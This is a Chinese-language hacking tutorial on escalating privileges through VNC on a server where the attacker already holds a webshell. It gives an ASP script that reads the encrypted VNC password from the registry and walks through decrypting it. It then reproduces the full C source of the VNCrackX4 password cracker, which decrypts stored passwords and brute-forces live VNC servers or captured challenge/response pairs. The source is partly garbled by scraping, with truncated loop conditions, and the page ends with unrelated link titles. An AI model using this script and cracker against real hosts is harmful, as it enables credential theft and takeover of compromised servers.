如何利用VNC服务提升权限

作者:小花

很多时候大家提升权限一般用SERVU，或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的，而且是图形界面，功能和远程终端类似。

如果得到了一个主机的WEBSHELL，想提升权限，发现主机运行了VNC服务，就可以考虑用下面的方法。

默认情况下VNC服务端的密码是放在注册表中的，本文只针对这种情况。

首先用ASP读出注册表中的加密密码，然后用破解工具破解。

我给出大家一个读取VNC密码的ASP脚本，默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

Set WshShell = server.createObject("WScript.Shell")

bkey=WSHShell.RegRead("HKCU\Software\ORL\WinVNC3\Password")

for each str in bkey

response.write hex(str)

next

读取出来后结果类似 49 40 15 F9 A3 5E 8B 22这种十六进制，这是VNC加密的密码。我们可以用vncx4

破解它，vncx4使用很简单，只要在命令行下输入

c:\>vncx4 -W

然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。

比如我给个测试

H:\tool>vncx4 -W

49

40

15

F9

A3

5E

8B

22

Entered HEX String: 49 40 15 f9 a3 5e 8b 22

VNC Password: 123456

好，我把这个工具的源代码和编译程序给出来，编译程序在最下面。

/* Project code: vncrack for windows (vnx4)

*

* FX <fx@phenoelit.de>

* Phenoelit (http://www.phenoelit.de/)

* (c) 2k

*

* Blocking delay idea by Stonneway.

*/

#include

#include

#include

file://#include

#include

#include "d3des.h"

#include "vncauth.h"

extern unsigned char fixedkey[8];

#define SPLASH "VNCrackX4 - by Phenoelit (http://www.phenoelit.de/)\n"

int verbose=0,lbf=0;

char *schallange=NULL, *sresponse=NULL;

void interactive(void);

void cr_crack(char *wordlist);

void *sec_malloc(size_t size) {

void *p;

if ((p=malloc(size))==NULL) {

fprintf(stderr,"malloc() failed for %d bytes\n",size);

exit (-1);

}

memset(p,0,size);

return p;

}

void usage(void) {

printf("VNCrackX4\n"

"by Phenoelit (http://www.phenoelit.de/)\n\n""Usage:\n"

"Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n"

"Windows interactive mode: ./vncrack -W \n"

"\tenter hex key one byte per line - find it in\n"

"\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n"

"\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n"

"Options for online mode:\n"

"-v\tverbose (repeat -v for more)\n"

"-p P\tconnect to port P instead of 5900\n"

"Options for PHoss intercepted challages:\n"

"-c \tchallange from PHoss output\n"

"-r \tresponse from PHoss output\n"

);

exit(-1);

}

void sleep(DWORD ms) {

DWORD t1;

t1=GetTickCount();

while (GetTickCount()<(t1+ms));

}

int main(int argc, char **argv) {

int sfd; /* socket */

unsigned long dest_ip;

struct sockaddr_in dest_addr;

char *rbuf;

unsigned char atype[4];

unsigned char challange[16];

char *vnchost=NULL;

u_short vncport=5900;

int i,ani=0;

char *wordlist=NULL;

FILE *fd;

char *tryword;

char servertext[255];

char *sthelp;

int conwait=90;

int redocount=0;

int redosleep=10;

/* check the command line options */

for (i=1;i switch (argv[i][1]) {

case 'v': // verbose

verbose++;

break;

case 'p':

if (argv[++i]==NULL) usage();

if ((vncport=atoi(argv[i]))==0) {

fprintf(stderr,"wrong port number: %s\n",argv[i]);

exit (-1);

}

break;

case 'h':

if (argv[++i]==NULL) usage();

vnchost=(char *)sec_malloc(strlen(argv[i])+1);

strcpy(vnchost,argv[i]);

break;

case 'w':

if (argv[++i]==NULL) usage();

wordlist=(char *)sec_malloc(strlen(argv[i])+1);

strcpy(wordlist,argv[i]);

break;

case 'W':

interactive();

break;

case 'c':

if (argv[++i]==NULL) usage();

schallange=(char *)sec_malloc(strlen(argv[i])+1);

strcpy(schallange,argv[i]);

break;

case 'r':

if (argv[++i]==NULL) usage();

sresponse=(char *)sec_malloc(strlen(argv[i])+1);

strcpy(sresponse,argv[i]);

break;

case 'R':

if (argv[++i]==NULL) usage();

redosleep=atoi(argv[i]);

break;

default:

usage();

}

}

if (schallange||sresponse) {

printf(SPLASH);

cr_crack(wordlist); /* exit is done here */

}

if (!(vnchost&&vncport&&wordlist)) usage();

printf(SPLASH);

/* host */

dest_ip=inet_addr(vnchost);

memcpy(&dest_addr.sin_addr,&dest_ip,sizeof(dest_ip));

dest_addr.sin_port=htons(vncport);

dest_addr.sin_family=AF_INET;

/* make sure we can talk WinSock

Comment: I like to enclose this, because it is SO UGLY */

{

WORD wVersionRequested;

WSADATA wsaData;

int err;

wVersionRequested = MAKEWORD(1, 1);

err = WSAStartup(wVersionRequested, &wsaData);

if (err != 0) {

fprintf(stderr,"Unable to start networking");

exit (-1);

}

} // WSA and GO

if ((fd=fopen(wordlist,"rt"))==NULL) {

fprintf(stderr,"Unable to open wordlist %s\n",wordlist);

exit (-1);

}

tryword=sec_malloc(256);

while (fgets(tryword,255,fd)!=NULL) {

/* cut the word */

if (tryword[strlen(tryword)-1]=='\n') tryword[strlen(tryword)-1]='\0';

ReDoClosed:

if (verbose) {

printf("\ntrying '%s' ...",tryword);

fflush(stdout);

}

if ((sfd=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET) {

fprintf(stderr,"Unable to get a socket");

exit (-1);

}

if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))!=0) {

fprintf(stderr,"Connect failed (%d).\n",WSAGetLastError());

exit(-1);

}

/* connunication starts with server->client version packet */

rbuf=sec_malloc(100);

if (recv(sfd,rbuf,100,0)<0) {

fprintf(stderr,"recv()");

exit(-1);

}

if (verbose>1) printf("\nServer Protocol version: %s",rbuf);

/* bounce this message back - so the server will continue */

if (send(sfd,rbuf,strlen(rbuf),0)<0) {

fprintf(stderr,"send()");

exit(-1);

}

if (recv(sfd,atype,sizeof(atype),0)<0) {

fprintf(stderr,"recv()");

exit(-1);

}

if (verbose>1) {

printf("Authentication type: ");

for (i=0;i<4;i++) { printf("%x ",atype[i]); }

printf("\n");

}

switch (atype[3]) {

case 0:

fprintf(stderr,"Server told me: connection close\n");

if (verbose) {

// try to retrieve the reason

memset(servertext,0,sizeof(servertext));

if (recv(sfd,servertext,sizeof(servertext),0)<0) {

fprintf(stderr,"recv() in verbose");

exit(-1);

} else {

sthelp=servertext;

sthelp+=4;

fprintf(stderr,"Server says: %s\n",sthelp);

}

if (verbose) printf("\tWaiting for blocking disable\n");

Sleep(redosleep*1000);

if ((redocount++)<3) {

goto ReDoClosed;

} else {

fprintf(stderr,"\tgiving up (increase -R)\n");

}

}

exit(-1);

break; /* not reached */

case 1:

printf( "\n>>>>>>>>>>>>>>>\n"

"Server does not require authentication!\n"

">>>>>>>>>>>>>>>\n");

exit(-1);

break; /* not reached */

case 2:

if (verbose>1)

printf( "Authentication type 'VNC authentication' - fine\n");

break;

default:

fprintf(stderr,"Unknown authentication requested by server\n");

exit(-1);

}

redocount=0;

if (recv(sfd,challange,sizeof(challange),0)<0) {

fprintf(stderr,"recv()");

exit(-1);

}

if (verbose>1) {

printf("challange: ");

for (i=0;i<16;i++) { printf("%x ",challange[i]); }

printf("\n");

}

/* encrypt challange with password and send this fuck to the server */

vncEncryptBytes(challange,tryword);

if (send(sfd,challange,sizeof(challange),0)<0) {

fprintf(stderr,"auth send()");

exit(-1);

}

atype[3]=0;

if (recv(sfd,atype,sizeof(atype),0)<0) {

fprintf(stderr,"auth recv()");

exit(-1);

}

switch (atype[3]) {

case 0:

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",tryword);

free(tryword);

exit(0);

break; /* not reached */

case 1: /* 'normal' failed */

if (verbose) printf("failed\n");

break;

case 2: /* too many */

printf("Server is angry, waiting for calm down...\n");

sleep(10000);

break;

default:

fprintf(stderr,"Unknown response\n");

exit(-1);

}

shutdown(sfd,2);

closesocket(sfd);

memset(tryword,0,256);

}

free(tryword);

fclose(fd);

return 0;

}

void interactive(void) {

unsigned char *pass;

int i;

char c;

pass=(char *)sec_malloc(9);

for (i=0;i<8;i++) {

scanf("%x",&c);

pass[i]=c;

}

printf("Entered HEX String: ");

for (i=0;i<8;i++) { printf("%x ",pass[i]); }

printf("\n");

deskey(fixedkey,DE1);

des(pass,pass);

printf("VNC Password: %s\n",pass);

exit(0);

}

void cr_crack(char *wordlist) {

int i,j;

#define CRL 16

char chl[CRL+1];

char rsp[CRL+1];

char tchl[CRL+1];

char ts[3];

FILE *fd;

char *tryword;

char bft[9];

char cset1[] =

"abcdefghijklmnopqrstuvwxyz"

"ABCDEFGHIJKLMNOPQRSTUVWXYZ"

"1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0";

#define cset1_len (92)

int cnt[8];

time_t t1,t2;

if (!wordlist) {

fprintf(stderr,"Supply wordlist file !");

exit(-1);

}

if ((!schallange)||(!sresponse)) {

usage();

}

if (

(strlen(schallange)!=16*2)

||(strlen(sresponse)!=16*2)

) {

fprintf(stderr,

"challange and response have to be 32 characters each\n");

exit (-1);

}

memset(&chl,0,CRL+1);

memset(&tchl,0,CRL+1);

memset(&rsp,0,CRL+1);

memset(&ts,0,3);

j=0;

for (i=0;i strncpy(ts,&schallange[j],2);

chl[i]=(unsigned char)strtol(ts,NULL,16);

strncpy(ts,&sresponse[j],2);

rsp[i]=(unsigned char)strtol(ts,NULL,16);

j+=2;

}

if (verbose) {

printf("Challange: ");

for (i=0;i printf("%x",(unsigned char) chl[i]);

}

printf("\n");

printf("Response : ");

for (i=0;i printf("%x",(unsigned char) rsp[i]);

}

printf("\n");

}

if ((fd=fopen(wordlist,"rt"))==NULL) {

fprintf(stderr,"Could not open wordlist\n");

exit (-1);

}

tryword=sec_malloc(256);

while (fgets(tryword,255,fd)!=NULL) {

tryword[strlen(tryword)-1]='\0';

/* try this word */

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,tryword);

if (verbose>1) {

for (i=0;i printf("%x",(unsigned char) rsp[i]);

}

printf("\n");

for (i=0;i printf("%x",(unsigned char) tchl[i]);

}

printf("\n");

}

if (!memcmp(tchl,rsp,CRL)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",tryword);

free(tryword);

exit(0);

} else {

if (verbose) printf("%s failed\n",tryword);

}

memset(tryword,0,256);

}

fclose(fd);

free(tryword);

printf( "-----------------------------------\n"

"Wordlist failed - going brute force\n"

"-----------------------------------\n" );

t1=GetTickCount();

bft[8]='\0';

bft[1]='\0';

printf("\tdepth I\n");

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

bft[2]='\0';

printf("\tdepth II\n");

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

/************/

bft[3]='\0';

printf("\tdepth III\n");

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

} file://2

/************/

bft[4]='\0';

printf("\tdepth IV\n");

for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

} file://2

} file://3

/************/

bft[5]='\0';

printf("\tdepth V\n");

for (cnt[4]=0;cnt[4] bft[4]=cset1[cnt[4]];

for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

} file://2

} file://3

} file://4

/************/

bft[6]='\0';

printf("\tdepth VI\n");

for (cnt[5]=0;cnt[5] bft[5]=cset1[cnt[5]];

for (cnt[4]=0;cnt[4] bft[4]=cset1[cnt[4]];

for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

} file://2

} file://3

} file://4

} file://5

/************/

bft[7]='\0';

printf("\tdepth VII\n");

for (cnt[6]=0;cnt[6] bft[6]=cset1[cnt[6]];

for (cnt[5]=0;cnt[5] bft[5]=cset1[cnt[5]];

for (cnt[4]=0;cnt[4] bft[4]=cset1[cnt[4]];

for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

} file://2

} file://3

} file://4

} file://5

} file://6

/************/

bft[8]='\0';

printf("\tdepth VIII\n");

for (cnt[7]=0;cnt[7] bft[7]=cset1[cnt[7]];

for (cnt[6]=0;cnt[6] bft[6]=cset1[cnt[6]];

for (cnt[5]=0;cnt[5] bft[5]=cset1[cnt[5]];

for (cnt[4]=0;cnt[4] bft[4]=cset1[cnt[4]];

for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];

for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];

for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];

for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];

if (verbose)

printf("try: %s\n",bft);

memcpy(tchl,chl,CRL);

vncEncryptBytes(tchl,bft);

if (!memcmp(tchl,rsp,16)) {

printf( "\n>>>>>>>>>>>>>>>\n"

"Password: %s\n"

">>>>>>>>>>>>>>>\n",

bft);

exit (0);

}

} // for 0

} // for 1

} file://2

} file://3

} file://4

} file://5

} file://6

} file://7

t2=GetTickCount();

printf("depth VIII (%20.4f wps)\n",(t2-t1)/63);

printf("Not in character set !\n");

exit(0);

}

• ·IIS版面中经常看到大家问一些相同的或者以前已
• ·5大减肥代餐食品 减肥_美丽顾问
• ·高热量食物有哪些 减肥_美丽顾问
• ·编写与.NET属性窗口交互的RAD组件（自序）
• ·Visual Basic串口通讯调试方法
• ·略谈Rundll32.exe的作用
• ·为什么要使用三层交换机
• ·使用IP地址来禁止内部用户上网
• ·Win2003作路由 局域网共享多出口上网
• ·Ojbect Pascal动态数组浅说